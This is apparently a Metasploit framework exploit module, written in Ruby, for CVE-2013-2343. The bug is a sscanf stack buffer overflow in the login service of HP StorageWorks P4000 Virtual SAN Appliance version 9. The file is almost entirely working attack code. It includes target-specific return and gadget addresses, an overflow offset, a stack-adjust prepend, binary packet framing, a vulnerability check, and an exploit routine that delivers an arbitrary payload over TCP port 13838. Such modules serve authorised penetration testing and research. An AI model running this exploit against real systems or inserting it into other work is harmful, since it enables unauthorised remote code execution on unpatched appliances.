Path: blob/master/modules/exploits/linux/misc/hp_vsa_login_bof.rb
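##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Stack buffer overflow in the login handler of the HP StorageWorks P4000
# Virtual SAN Appliance (CVE-2013-2343, fixed in 10.0).  The '/'-separated
# login string is parsed with sscanf() into a fixed-size buffer; the user-name
# field is used to run past it and overwrite the saved return address.
#
# Both network methods wrap the socket use in ensure/disconnect so a failed
# put/get does not leave the connection open until module cleanup.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata and options.  Only RPORT is registered here; RHOST and the
  # payload options are provided by the Tcp mixin and the framework.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
      'Description'    => %q{
        This module exploits a buffer overflow vulnerability found in HP's StorageWorks
        P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage
        of the sscanf() function when parsing login requests. This module has been tested
        successfully on the HP VSA 9 Virtual Appliance.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2013-2343'],
          ['OSVDB', '94701'],
          ['ZDI', '13-179'],
          ['URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318']
        ],
      'Payload'        =>
        {
          # '/' separates the fields of the login string and NUL terminates the
          # packet (see generate_packet); CR/LF are presumably line terminators
          # for the parser -- confirm against the service if changing this.
          'BadChars' => "\x2f\x00\x0d\x0a",
          'Space' => 780,
          'DisableNops' => true,
          # add esp, -3500: move the stack pointer below the payload before it
          # runs so the payload's own stack use does not clobber its code.
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => ['linux'],
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          # All addresses are taken from the target's 'hydra' binary / data
          # section, so they are only valid for the exact version below.
          [ 'HP VSA 9',
            {
              'Version'    => '9.0.0',      # version string sent by check()
              'Offset'     => 3446,         # bytes of user name before the saved return address
              'Ret'        => 0x0804EB34,   # pop ebp # ret # from hydra
              'FakeObject' => 0x08072E58,   # from hydra data
              'JmpEsp'     => 0x08050CB8    # push esp # ret # from hydra
            }
          ]
        ],
      'Privileged'     => true,           # the exploited process is declared privileged
      'DisclosureDate' => '2013-06-28',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 13838])
      ])
  end

  # Sends a login request with a bogus user name and classifies the reply.
  #
  # Returns:
  #   CheckCode::Appears  - reply contains both "OK" and "Login"
  #   CheckCode::Detected - reply contains both "FAILED" and "version"
  #   CheckCode::Safe     - anything else, including no reply before
  #                         get_once's timeout
  #
  # This is an unauthenticated probe with a fake user name, so it may show up
  # in the appliance's logs as a failed login.  The socket is always closed,
  # even if put/get_once raise.
  def check
    connect
    begin
      probe = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
      vprint_status("#{rhost}:#{rport} Sending login packet to check...")
      sock.put(probe)
      res = sock.get_once
    ensure
      disconnect
    end

    classify_check_response(res)
  end

  # Maps the raw reply of the login service to a CheckCode.  Uses substring
  # tests rather than regexes so a reply with arbitrary bytes cannot raise an
  # encoding error while being matched.
  def classify_check_response(res)
    return Exploit::CheckCode::Safe unless res
    return Exploit::CheckCode::Appears if res.include?('OK') && res.include?('Login')
    return Exploit::CheckCode::Detected if res.include?('FAILED') && res.include?('version')

    Exploit::CheckCode::Safe
  end

  # Builds one framed message for the login service.
  #
  # Wire layout (all integers big-endian, 32 bytes of header in total):
  #   N 0, N 1                   fixed words, replayed as captured
  #   N bytesize(data) + 1       length of data including its NUL terminator
  #   N 0, N 0, N 0              fixed words, replayed as captured
  #   N 0x14, N 0xffffffff       fixed words, replayed as captured
  #   data                       the login string
  #   "\x00"                     terminator
  # The meaning of the fixed header words is not known here.  The length is
  # computed in bytes so a multibyte-tagged data string cannot yield a short
  # length field; building the header with pack keeps it binary-encoded
  # regardless of how the surrounding literals are tagged.
  def generate_packet(data)
    header = [0, 1, data.bytesize + 1, 0, 0, 0, 0x14, 0xffffffff].pack('N8')
    header << data << "\x00"
  end

  # Sends the overflowing login request.  The user-name field is Offset bytes
  # of filler, then the overwritten return address (pop ebp; ret), a pointer to
  # a fake object so LHNSessionManager::SendMessage survives until the
  # function returns, a push esp; ret gadget that lands in the payload, and
  # the payload itself.  A throw-away version string makes the handler return
  # as early as possible.  No reply is read: the payload runs on return.
  def exploit
    connect
    begin
      print_status("#{rhost}:#{rport} Sending login packet")
      overflow = [
        rand_text(target['Offset']),          # filler up to the saved return address
        [target.ret].pack('V'),               # pop ebp # ret
        [target['FakeObject']].pack('V'),     # fake object used by LHNSessionManager::SendMessage before ret
        [target['JmpEsp']].pack('V'),         # push esp # ret -> payload
        payload.encoded
      ].join
      packet = generate_packet("login:/#global$agent/#{overflow}/#{rand_text_alpha(5)}/Version \"1\" ") # Fake version in order to ret asap
      sock.put(packet)
    ensure
      disconnect
    end
  end
end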